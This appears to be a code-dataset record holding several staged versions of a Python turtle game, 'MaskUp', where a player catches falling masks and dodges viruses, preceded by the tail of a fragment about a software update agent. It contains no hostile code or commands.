localLog.debug(\"Attempting to update server with software info...\")\n allThreads['GregerDatabase'].update('about', softwareInfo)\n\n # Tell GCM to stop all treads (except GUA)...\n self.log.info(\"Attempting to stop all exection before restarting...\")\n allThreads['GregerClientModule'].stopAll(GUA=True)\n\n # Restart Application\n self.log.info(\"Attemption to restart application...\")\n restart_program()\n\n if 'guaCheckUpdateDelay' in GregerDatabase.settings:\n delayTime = GregerDatabase.settings['guaCheckUpdateDelay']['value']\n else:\n delayTime = 10\n self.log.warning(\"Settings not defined! (using default=10)\")\n\n # Wait update delay\n self.log.info(\"Waiting \" + str(delayTime) + \"s...\")\n self.stopExecution.wait(delayTime)\n\n self.log.info(\"Greger Update Agent (GUA) execution stopped!\")\n",
"step-ids": [
5,
6,
7,
8,
11
]
}
|
[
5,
6,
7,
8,
11
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
wn.title('MaskUp')
wn.bgcolor('green')
wn.bgpic('retro_city_title_page.gif')
wn.setup(width=800, height=600)
wn.tracer(0)
wn.register_shape('human.gif')
def game_loop():
score = 0
lives = 3
wn.register_shape('human.gif')
wn.register_shape('Evil-Virus.gif')
wn.register_shape('surgical-mask.gif')
player = turtle.Turtle()
player.speed(0)
player.shape('human.gif')
player.color('white')
player.penup()
player.goto(0, -250)
player.direction = 'stop'
good_guys = []
for _ in range(3):
good_guy = turtle.Turtle()
good_guy.speed(0)
good_guy.shape('surgical-mask.gif')
good_guy.color('blue')
good_guy.penup()
good_guy.goto(-100, 250)
good_guy.speed = random.uniform(0.3, 2.0)
good_guys.append(good_guy)
bad_guys = []
for _ in range(5):
bad_guy = turtle.Turtle()
bad_guy.speed(0)
bad_guy.shape('Evil-Virus.gif')
bad_guy.color('red')
bad_guy.penup()
bad_guy.goto(100, 250)
bad_guy.speed = random.uniform(0.3, 1.0)
bad_guys.append(bad_guy)
pen = turtle.Turtle()
pen.hideturtle()
pen.speed(0)
pen.shape('square')
pen.color('white')
pen.penup()
pen.goto(0, 260)
font = 'Courier', 24, 'normal'
pen.write('Score: {} Lives: {}'.format(score, lives), align='center',
font=font)
def show_message(score):
message = turtle.Turtle()
message.hideturtle()
message.speed(0)
message.color('yellow')
message.penup()
message.goto(0, 0)
font = 'Calibri', 24, 'bold'
message.write(
'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\n Score: {}\n!MASK UP and STAY SAFE!'
.format(score), align='center', font=font)
def go_left():
player.direction = 'left'
def go_right():
player.direction = 'right'
def stop_player():
player.direction = 'stop'
wn.listen()
wn.onkeypress(go_left, 'Left')
wn.onkeyrelease(stop_player, 'Left')
wn.onkeypress(go_right, 'Right')
wn.onkeyrelease(stop_player, 'Right')
while True:
wn.update()
if player.direction == 'left':
x = player.xcor()
if x > -365:
x -= 0.8
player.setx(x)
if player.direction == 'right':
x = player.xcor()
if x < 365:
x += 0.8
player.setx(x)
for good_guy in good_guys:
y = good_guy.ycor()
y -= good_guy.speed
good_guy.sety(y)
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
if good_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
score += 10
pen.clear()
pen.write('Score: {} Lives: {}'.format(score, lives), align
='center', font=font)
winsound.PlaySound('video_game_retro_8bit_coin', winsound.
SND_FILENAME)
for bad_guy in bad_guys:
y = bad_guy.ycor()
y -= bad_guy.speed
bad_guy.sety(y)
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
if bad_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
score -= 10
lives -= 1
pen.clear()
pen.write('Score: {} Lives: {}'.format(score, lives), align
='center', font=font)
winsound.PlaySound('arcade_game_alarm_short', winsound.
SND_FILENAME)
if lives <= 0:
pen.clear()
bad_guy.clear()
good_guy.clear()
show_message(score)
winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)
break
while True:
wn.update()
wn.bgpic('retro_city.gif')
winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)
game_loop()
turtle.Screen().clear()
wn = turtle.Screen()
wn.title('MaskUp')
wn.bgcolor('green')
wn.bgpic('retro_city_title_page.gif')
wn.setup(width=800, height=600)
wn.tracer(0)
wn.mainloop()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
wn = turtle.Screen()
wn.title('MaskUp')
wn.bgcolor('green')
wn.bgpic('retro_city_title_page.gif')
wn.setup(width=800, height=600)
wn.tracer(0)
wn.register_shape('human.gif')
def game_loop():
score = 0
lives = 3
wn.register_shape('human.gif')
wn.register_shape('Evil-Virus.gif')
wn.register_shape('surgical-mask.gif')
player = turtle.Turtle()
player.speed(0)
player.shape('human.gif')
player.color('white')
player.penup()
player.goto(0, -250)
player.direction = 'stop'
good_guys = []
for _ in range(3):
good_guy = turtle.Turtle()
good_guy.speed(0)
good_guy.shape('surgical-mask.gif')
good_guy.color('blue')
good_guy.penup()
good_guy.goto(-100, 250)
good_guy.speed = random.uniform(0.3, 2.0)
good_guys.append(good_guy)
bad_guys = []
for _ in range(5):
bad_guy = turtle.Turtle()
bad_guy.speed(0)
bad_guy.shape('Evil-Virus.gif')
bad_guy.color('red')
bad_guy.penup()
bad_guy.goto(100, 250)
bad_guy.speed = random.uniform(0.3, 1.0)
bad_guys.append(bad_guy)
pen = turtle.Turtle()
pen.hideturtle()
pen.speed(0)
pen.shape('square')
pen.color('white')
pen.penup()
pen.goto(0, 260)
font = 'Courier', 24, 'normal'
pen.write('Score: {} Lives: {}'.format(score, lives), align='center',
font=font)
def show_message(score):
message = turtle.Turtle()
message.hideturtle()
message.speed(0)
message.color('yellow')
message.penup()
message.goto(0, 0)
font = 'Calibri', 24, 'bold'
message.write(
'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\n Score: {}\n!MASK UP and STAY SAFE!'
.format(score), align='center', font=font)
def go_left():
player.direction = 'left'
def go_right():
player.direction = 'right'
def stop_player():
player.direction = 'stop'
wn.listen()
wn.onkeypress(go_left, 'Left')
wn.onkeyrelease(stop_player, 'Left')
wn.onkeypress(go_right, 'Right')
wn.onkeyrelease(stop_player, 'Right')
while True:
wn.update()
if player.direction == 'left':
x = player.xcor()
if x > -365:
x -= 0.8
player.setx(x)
if player.direction == 'right':
x = player.xcor()
if x < 365:
x += 0.8
player.setx(x)
for good_guy in good_guys:
y = good_guy.ycor()
y -= good_guy.speed
good_guy.sety(y)
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
if good_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
score += 10
pen.clear()
pen.write('Score: {} Lives: {}'.format(score, lives), align
='center', font=font)
winsound.PlaySound('video_game_retro_8bit_coin', winsound.
SND_FILENAME)
for bad_guy in bad_guys:
y = bad_guy.ycor()
y -= bad_guy.speed
bad_guy.sety(y)
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
if bad_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
score -= 10
lives -= 1
pen.clear()
pen.write('Score: {} Lives: {}'.format(score, lives), align
='center', font=font)
winsound.PlaySound('arcade_game_alarm_short', winsound.
SND_FILENAME)
if lives <= 0:
pen.clear()
bad_guy.clear()
good_guy.clear()
show_message(score)
winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)
break
while True:
wn.update()
wn.bgpic('retro_city.gif')
winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)
game_loop()
turtle.Screen().clear()
wn = turtle.Screen()
wn.title('MaskUp')
wn.bgcolor('green')
wn.bgpic('retro_city_title_page.gif')
wn.setup(width=800, height=600)
wn.tracer(0)
wn.mainloop()
<|reserved_special_token_1|>
import turtle
import random
import winsound
import sys
<|reserved_special_token_0|>
wn = turtle.Screen()
wn.title('MaskUp')
wn.bgcolor('green')
wn.bgpic('retro_city_title_page.gif')
wn.setup(width=800, height=600)
wn.tracer(0)
wn.register_shape('human.gif')
def game_loop():
score = 0
lives = 3
wn.register_shape('human.gif')
wn.register_shape('Evil-Virus.gif')
wn.register_shape('surgical-mask.gif')
player = turtle.Turtle()
player.speed(0)
player.shape('human.gif')
player.color('white')
player.penup()
player.goto(0, -250)
player.direction = 'stop'
good_guys = []
for _ in range(3):
good_guy = turtle.Turtle()
good_guy.speed(0)
good_guy.shape('surgical-mask.gif')
good_guy.color('blue')
good_guy.penup()
good_guy.goto(-100, 250)
good_guy.speed = random.uniform(0.3, 2.0)
good_guys.append(good_guy)
bad_guys = []
for _ in range(5):
bad_guy = turtle.Turtle()
bad_guy.speed(0)
bad_guy.shape('Evil-Virus.gif')
bad_guy.color('red')
bad_guy.penup()
bad_guy.goto(100, 250)
bad_guy.speed = random.uniform(0.3, 1.0)
bad_guys.append(bad_guy)
pen = turtle.Turtle()
pen.hideturtle()
pen.speed(0)
pen.shape('square')
pen.color('white')
pen.penup()
pen.goto(0, 260)
font = 'Courier', 24, 'normal'
pen.write('Score: {} Lives: {}'.format(score, lives), align='center',
font=font)
def show_message(score):
message = turtle.Turtle()
message.hideturtle()
message.speed(0)
message.color('yellow')
message.penup()
message.goto(0, 0)
font = 'Calibri', 24, 'bold'
message.write(
'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\n Score: {}\n!MASK UP and STAY SAFE!'
.format(score), align='center', font=font)
def go_left():
player.direction = 'left'
def go_right():
player.direction = 'right'
def stop_player():
player.direction = 'stop'
wn.listen()
wn.onkeypress(go_left, 'Left')
wn.onkeyrelease(stop_player, 'Left')
wn.onkeypress(go_right, 'Right')
wn.onkeyrelease(stop_player, 'Right')
while True:
wn.update()
if player.direction == 'left':
x = player.xcor()
if x > -365:
x -= 0.8
player.setx(x)
if player.direction == 'right':
x = player.xcor()
if x < 365:
x += 0.8
player.setx(x)
for good_guy in good_guys:
y = good_guy.ycor()
y -= good_guy.speed
good_guy.sety(y)
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
if good_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
score += 10
pen.clear()
pen.write('Score: {} Lives: {}'.format(score, lives), align
='center', font=font)
winsound.PlaySound('video_game_retro_8bit_coin', winsound.
SND_FILENAME)
for bad_guy in bad_guys:
y = bad_guy.ycor()
y -= bad_guy.speed
bad_guy.sety(y)
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
if bad_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
score -= 10
lives -= 1
pen.clear()
pen.write('Score: {} Lives: {}'.format(score, lives), align
='center', font=font)
winsound.PlaySound('arcade_game_alarm_short', winsound.
SND_FILENAME)
if lives <= 0:
pen.clear()
bad_guy.clear()
good_guy.clear()
show_message(score)
winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)
break
while True:
wn.update()
wn.bgpic('retro_city.gif')
winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)
game_loop()
turtle.Screen().clear()
wn = turtle.Screen()
wn.title('MaskUp')
wn.bgcolor('green')
wn.bgpic('retro_city_title_page.gif')
wn.setup(width=800, height=600)
wn.tracer(0)
wn.mainloop()
<|reserved_special_token_1|>
import turtle
import random
import winsound
import sys
""" new_game = False
def toggle_new_game():
global new_game
if new_game == False:
new_game = True
else:
new_game = False """
wn = turtle.Screen()
wn.title("MaskUp")
wn.bgcolor("green")
wn.bgpic("retro_city_title_page.gif")
wn.setup(width=800, height=600)
wn.tracer(0)
wn.register_shape("human.gif")
def game_loop():
score = 0
lives = 3
wn.register_shape("human.gif")
wn.register_shape("Evil-Virus.gif")
wn.register_shape("surgical-mask.gif")
# Add the player
player = turtle.Turtle()
player.speed(0)
player.shape("human.gif")
player.color("white")
player.penup()
player.goto(0, -250)
player.direction = "stop"
# Create a list of good guys
good_guys = []
# Add the good_guys
for _ in range(3):
good_guy = turtle.Turtle()
good_guy.speed(0)
good_guy.shape("surgical-mask.gif")
good_guy.color("blue")
good_guy.penup()
good_guy.goto(-100, 250)
good_guy.speed = random.uniform(0.3, 2.0)
good_guys.append(good_guy)
# Create a list of bad guys
bad_guys = []
# Add the bad_guys
for _ in range(5):
bad_guy = turtle.Turtle()
bad_guy.speed(0)
bad_guy.shape("Evil-Virus.gif")
bad_guy.color("red")
bad_guy.penup()
bad_guy.goto(100, 250)
bad_guy.speed = random.uniform(0.3, 1.0)
bad_guys.append(bad_guy)
# Make the pen
pen = turtle.Turtle()
pen.hideturtle()
pen.speed(0)
pen.shape("square")
pen.color("white")
pen.penup()
pen.goto(0, 260)
font = ("Courier", 24, "normal")
pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font)
# Make the message
def show_message(score):
message = turtle.Turtle()
message.hideturtle()
message.speed(0)
message.color("yellow")
message.penup()
message.goto(0, 0)
font = ("Calibri", 24, "bold")
message.write("GAME OVER: TOO MUCH EXPOSURE TO VIRUS\n Score: {}\n!MASK UP and STAY SAFE!".format(score), align="center", font=font)
# Functions
def go_left():
player.direction = "left"
def go_right():
player.direction = "right"
def stop_player():
player.direction = "stop"
# Keyboard Binding
wn.listen()
wn.onkeypress(go_left, "Left")
wn.onkeyrelease(stop_player, "Left")
wn.onkeypress(go_right, "Right")
wn.onkeyrelease(stop_player, "Right")
while True:
# Update screen
wn.update()
# Move the player
if player.direction == "left":
x = player.xcor()
if x > -365:
x -= 0.8
player.setx(x)
if player.direction == "right":
x = player.xcor()
if x < 365:
x += 0.8
player.setx(x)
# Move the good guys
for good_guy in good_guys:
y = good_guy.ycor()
y -= good_guy.speed
good_guy.sety(y)
# Check if off the screen
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
# Check for a collision with player
if good_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
score += 10
pen.clear()
pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font)
winsound.PlaySound("video_game_retro_8bit_coin", winsound.SND_FILENAME)
# Move the bad guys
for bad_guy in bad_guys:
y = bad_guy.ycor()
y -= bad_guy.speed
bad_guy.sety(y)
# Check if off the screen
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
# Check for a collision with player
if bad_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
score -= 10
lives -= 1
pen.clear()
pen.write("Score: {} Lives: {}".format(score, lives), align="center", font=font)
winsound.PlaySound("arcade_game_alarm_short", winsound.SND_FILENAME)
if lives <= 0:
pen.clear()
bad_guy.clear()
good_guy.clear()
show_message(score)
winsound.PlaySound("game_over_sound", winsound.SND_FILENAME)
# wn.listen()
# if wn.onkeypress(toggle_new_game, "a"):
# if new_game == True:
break
# wn.onkeypress(sys.exit(), "q")
while True:
# Update screen
wn.update()
# Play music
wn.bgpic("retro_city.gif")
winsound.PlaySound("retro_video_game_music-trimmed", winsound.SND_LOOP)
game_loop()
turtle.Screen().clear()
wn = turtle.Screen()
wn.title("MaskUp")
wn.bgcolor("green")
wn.bgpic("retro_city_title_page.gif")
wn.setup(width=800, height=600)
wn.tracer(0)
#sys.exit()
wn.mainloop()
|
flexible
|
{
"blob_id": "1593280a29b13461b13d8b2805d9ac53ce94c759",
"index": 2948,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwn.title('MaskUp')\nwn.bgcolor('green')\nwn.bgpic('retro_city_title_page.gif')\nwn.setup(width=800, height=600)\nwn.tracer(0)\nwn.register_shape('human.gif')\n\n\ndef game_loop():\n score = 0\n lives = 3\n wn.register_shape('human.gif')\n wn.register_shape('Evil-Virus.gif')\n wn.register_shape('surgical-mask.gif')\n player = turtle.Turtle()\n player.speed(0)\n player.shape('human.gif')\n player.color('white')\n player.penup()\n player.goto(0, -250)\n player.direction = 'stop'\n good_guys = []\n for _ in range(3):\n good_guy = turtle.Turtle()\n good_guy.speed(0)\n good_guy.shape('surgical-mask.gif')\n good_guy.color('blue')\n good_guy.penup()\n good_guy.goto(-100, 250)\n good_guy.speed = random.uniform(0.3, 2.0)\n good_guys.append(good_guy)\n bad_guys = []\n for _ in range(5):\n bad_guy = turtle.Turtle()\n bad_guy.speed(0)\n bad_guy.shape('Evil-Virus.gif')\n bad_guy.color('red')\n bad_guy.penup()\n bad_guy.goto(100, 250)\n bad_guy.speed = random.uniform(0.3, 1.0)\n bad_guys.append(bad_guy)\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(0)\n pen.shape('square')\n pen.color('white')\n pen.penup()\n pen.goto(0, 260)\n font = 'Courier', 24, 'normal'\n pen.write('Score: {} Lives: {}'.format(score, lives), align='center',\n font=font)\n\n def show_message(score):\n message = turtle.Turtle()\n message.hideturtle()\n message.speed(0)\n message.color('yellow')\n message.penup()\n message.goto(0, 0)\n font = 'Calibri', 24, 'bold'\n message.write(\n 'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!'\n .format(score), align='center', font=font)\n\n def go_left():\n player.direction = 'left'\n\n def go_right():\n player.direction = 'right'\n\n def stop_player():\n player.direction = 'stop'\n wn.listen()\n wn.onkeypress(go_left, 'Left')\n wn.onkeyrelease(stop_player, 'Left')\n wn.onkeypress(go_right, 'Right')\n wn.onkeyrelease(stop_player, 'Right')\n while True:\n wn.update()\n if player.direction == 'left':\n x = player.xcor()\n if x > -365:\n x -= 0.8\n player.setx(x)\n if player.direction == 'right':\n x = player.xcor()\n if x < 365:\n x += 0.8\n player.setx(x)\n for good_guy in good_guys:\n y = good_guy.ycor()\n y -= good_guy.speed\n good_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n if good_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n score += 10\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('video_game_retro_8bit_coin', winsound.\n SND_FILENAME)\n for bad_guy in bad_guys:\n y = bad_guy.ycor()\n y -= bad_guy.speed\n bad_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n if bad_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n score -= 10\n lives -= 1\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('arcade_game_alarm_short', winsound.\n SND_FILENAME)\n if lives <= 0:\n pen.clear()\n bad_guy.clear()\n good_guy.clear()\n show_message(score)\n winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)\n break\n\n\nwhile True:\n wn.update()\n wn.bgpic('retro_city.gif')\n winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)\n game_loop()\n turtle.Screen().clear()\n wn = turtle.Screen()\n wn.title('MaskUp')\n wn.bgcolor('green')\n wn.bgpic('retro_city_title_page.gif')\n wn.setup(width=800, height=600)\n wn.tracer(0)\nwn.mainloop()\n",
"step-3": "<mask token>\nwn = turtle.Screen()\nwn.title('MaskUp')\nwn.bgcolor('green')\nwn.bgpic('retro_city_title_page.gif')\nwn.setup(width=800, height=600)\nwn.tracer(0)\nwn.register_shape('human.gif')\n\n\ndef game_loop():\n score = 0\n lives = 3\n wn.register_shape('human.gif')\n wn.register_shape('Evil-Virus.gif')\n wn.register_shape('surgical-mask.gif')\n player = turtle.Turtle()\n player.speed(0)\n player.shape('human.gif')\n player.color('white')\n player.penup()\n player.goto(0, -250)\n player.direction = 'stop'\n good_guys = []\n for _ in range(3):\n good_guy = turtle.Turtle()\n good_guy.speed(0)\n good_guy.shape('surgical-mask.gif')\n good_guy.color('blue')\n good_guy.penup()\n good_guy.goto(-100, 250)\n good_guy.speed = random.uniform(0.3, 2.0)\n good_guys.append(good_guy)\n bad_guys = []\n for _ in range(5):\n bad_guy = turtle.Turtle()\n bad_guy.speed(0)\n bad_guy.shape('Evil-Virus.gif')\n bad_guy.color('red')\n bad_guy.penup()\n bad_guy.goto(100, 250)\n bad_guy.speed = random.uniform(0.3, 1.0)\n bad_guys.append(bad_guy)\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(0)\n pen.shape('square')\n pen.color('white')\n pen.penup()\n pen.goto(0, 260)\n font = 'Courier', 24, 'normal'\n pen.write('Score: {} Lives: {}'.format(score, lives), align='center',\n font=font)\n\n def show_message(score):\n message = turtle.Turtle()\n message.hideturtle()\n message.speed(0)\n message.color('yellow')\n message.penup()\n message.goto(0, 0)\n font = 'Calibri', 24, 'bold'\n message.write(\n 'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!'\n .format(score), align='center', font=font)\n\n def go_left():\n player.direction = 'left'\n\n def go_right():\n player.direction = 'right'\n\n def stop_player():\n player.direction = 'stop'\n wn.listen()\n wn.onkeypress(go_left, 'Left')\n wn.onkeyrelease(stop_player, 'Left')\n wn.onkeypress(go_right, 'Right')\n wn.onkeyrelease(stop_player, 'Right')\n while True:\n wn.update()\n if player.direction == 'left':\n x = player.xcor()\n if x > -365:\n x -= 0.8\n player.setx(x)\n if player.direction == 'right':\n x = player.xcor()\n if x < 365:\n x += 0.8\n player.setx(x)\n for good_guy in good_guys:\n y = good_guy.ycor()\n y -= good_guy.speed\n good_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n if good_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n score += 10\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('video_game_retro_8bit_coin', winsound.\n SND_FILENAME)\n for bad_guy in bad_guys:\n y = bad_guy.ycor()\n y -= bad_guy.speed\n bad_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n if bad_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n score -= 10\n lives -= 1\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('arcade_game_alarm_short', winsound.\n SND_FILENAME)\n if lives <= 0:\n pen.clear()\n bad_guy.clear()\n good_guy.clear()\n show_message(score)\n winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)\n break\n\n\nwhile True:\n wn.update()\n wn.bgpic('retro_city.gif')\n winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)\n game_loop()\n turtle.Screen().clear()\n wn = turtle.Screen()\n wn.title('MaskUp')\n wn.bgcolor('green')\n wn.bgpic('retro_city_title_page.gif')\n wn.setup(width=800, height=600)\n wn.tracer(0)\nwn.mainloop()\n",
"step-4": "import turtle\nimport random\nimport winsound\nimport sys\n<mask token>\nwn = turtle.Screen()\nwn.title('MaskUp')\nwn.bgcolor('green')\nwn.bgpic('retro_city_title_page.gif')\nwn.setup(width=800, height=600)\nwn.tracer(0)\nwn.register_shape('human.gif')\n\n\ndef game_loop():\n score = 0\n lives = 3\n wn.register_shape('human.gif')\n wn.register_shape('Evil-Virus.gif')\n wn.register_shape('surgical-mask.gif')\n player = turtle.Turtle()\n player.speed(0)\n player.shape('human.gif')\n player.color('white')\n player.penup()\n player.goto(0, -250)\n player.direction = 'stop'\n good_guys = []\n for _ in range(3):\n good_guy = turtle.Turtle()\n good_guy.speed(0)\n good_guy.shape('surgical-mask.gif')\n good_guy.color('blue')\n good_guy.penup()\n good_guy.goto(-100, 250)\n good_guy.speed = random.uniform(0.3, 2.0)\n good_guys.append(good_guy)\n bad_guys = []\n for _ in range(5):\n bad_guy = turtle.Turtle()\n bad_guy.speed(0)\n bad_guy.shape('Evil-Virus.gif')\n bad_guy.color('red')\n bad_guy.penup()\n bad_guy.goto(100, 250)\n bad_guy.speed = random.uniform(0.3, 1.0)\n bad_guys.append(bad_guy)\n pen = turtle.Turtle()\n pen.hideturtle()\n pen.speed(0)\n pen.shape('square')\n pen.color('white')\n pen.penup()\n pen.goto(0, 260)\n font = 'Courier', 24, 'normal'\n pen.write('Score: {} Lives: {}'.format(score, lives), align='center',\n font=font)\n\n def show_message(score):\n message = turtle.Turtle()\n message.hideturtle()\n message.speed(0)\n message.color('yellow')\n message.penup()\n message.goto(0, 0)\n font = 'Calibri', 24, 'bold'\n message.write(\n 'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!'\n .format(score), align='center', font=font)\n\n def go_left():\n player.direction = 'left'\n\n def go_right():\n player.direction = 'right'\n\n def stop_player():\n player.direction = 'stop'\n wn.listen()\n wn.onkeypress(go_left, 'Left')\n wn.onkeyrelease(stop_player, 'Left')\n wn.onkeypress(go_right, 'Right')\n wn.onkeyrelease(stop_player, 'Right')\n while True:\n wn.update()\n if player.direction == 'left':\n x = player.xcor()\n if x > -365:\n x -= 0.8\n player.setx(x)\n if player.direction == 'right':\n x = player.xcor()\n if x < 365:\n x += 0.8\n player.setx(x)\n for good_guy in good_guys:\n y = good_guy.ycor()\n y -= good_guy.speed\n good_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n if good_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n good_guy.goto(x, y)\n score += 10\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('video_game_retro_8bit_coin', winsound.\n SND_FILENAME)\n for bad_guy in bad_guys:\n y = bad_guy.ycor()\n y -= bad_guy.speed\n bad_guy.sety(y)\n if y < -300:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n if bad_guy.distance(player) < 40:\n x = random.randint(-380, 380)\n y = random.randint(300, 400)\n bad_guy.goto(x, y)\n score -= 10\n lives -= 1\n pen.clear()\n pen.write('Score: {} Lives: {}'.format(score, lives), align\n ='center', font=font)\n winsound.PlaySound('arcade_game_alarm_short', winsound.\n SND_FILENAME)\n if lives <= 0:\n pen.clear()\n bad_guy.clear()\n good_guy.clear()\n show_message(score)\n winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)\n break\n\n\nwhile True:\n wn.update()\n wn.bgpic('retro_city.gif')\n winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)\n game_loop()\n turtle.Screen().clear()\n wn = turtle.Screen()\n wn.title('MaskUp')\n wn.bgcolor('green')\n wn.bgpic('retro_city_title_page.gif')\n wn.setup(width=800, height=600)\n wn.tracer(0)\nwn.mainloop()\n",
"step-5": "\r\nimport turtle\r\nimport random\r\nimport winsound\r\nimport sys\r\n\r\n\r\n\r\n\"\"\" new_game = False\r\n\r\ndef toggle_new_game():\r\n global new_game\r\n if new_game == False:\r\n new_game = True\r\n else:\r\n new_game = False \"\"\"\r\n\r\nwn = turtle.Screen()\r\nwn.title(\"MaskUp\")\r\nwn.bgcolor(\"green\")\r\nwn.bgpic(\"retro_city_title_page.gif\")\r\nwn.setup(width=800, height=600)\r\nwn.tracer(0)\r\nwn.register_shape(\"human.gif\")\r\n\r\n\r\ndef game_loop():\r\n score = 0\r\n lives = 3\r\n\r\n wn.register_shape(\"human.gif\")\r\n wn.register_shape(\"Evil-Virus.gif\")\r\n wn.register_shape(\"surgical-mask.gif\")\r\n\r\n # Add the player\r\n player = turtle.Turtle()\r\n player.speed(0)\r\n player.shape(\"human.gif\")\r\n player.color(\"white\")\r\n player.penup()\r\n player.goto(0, -250)\r\n player.direction = \"stop\"\r\n\r\n\r\n # Create a list of good guys\r\n good_guys = []\r\n\r\n # Add the good_guys\r\n for _ in range(3):\r\n good_guy = turtle.Turtle()\r\n good_guy.speed(0)\r\n good_guy.shape(\"surgical-mask.gif\")\r\n good_guy.color(\"blue\")\r\n good_guy.penup()\r\n good_guy.goto(-100, 250)\r\n good_guy.speed = random.uniform(0.3, 2.0)\r\n good_guys.append(good_guy)\r\n\r\n # Create a list of bad guys\r\n bad_guys = []\r\n\r\n # Add the bad_guys\r\n for _ in range(5):\r\n bad_guy = turtle.Turtle()\r\n bad_guy.speed(0)\r\n bad_guy.shape(\"Evil-Virus.gif\")\r\n bad_guy.color(\"red\")\r\n bad_guy.penup()\r\n bad_guy.goto(100, 250)\r\n bad_guy.speed = random.uniform(0.3, 1.0)\r\n bad_guys.append(bad_guy)\r\n\r\n \r\n # Make the pen\r\n pen = turtle.Turtle()\r\n pen.hideturtle()\r\n pen.speed(0)\r\n pen.shape(\"square\")\r\n pen.color(\"white\")\r\n pen.penup()\r\n pen.goto(0, 260)\r\n font = (\"Courier\", 24, \"normal\")\r\n pen.write(\"Score: {} Lives: {}\".format(score, lives), align=\"center\", font=font)\r\n\r\n # Make the message\r\n def show_message(score):\r\n message = turtle.Turtle()\r\n message.hideturtle()\r\n message.speed(0)\r\n message.color(\"yellow\")\r\n message.penup()\r\n message.goto(0, 0)\r\n font = (\"Calibri\", 24, \"bold\")\r\n message.write(\"GAME OVER: TOO MUCH EXPOSURE TO VIRUS\\n Score: {}\\n!MASK UP and STAY SAFE!\".format(score), align=\"center\", font=font) \r\n\r\n # Functions\r\n def go_left():\r\n player.direction = \"left\"\r\n\r\n def go_right():\r\n player.direction = 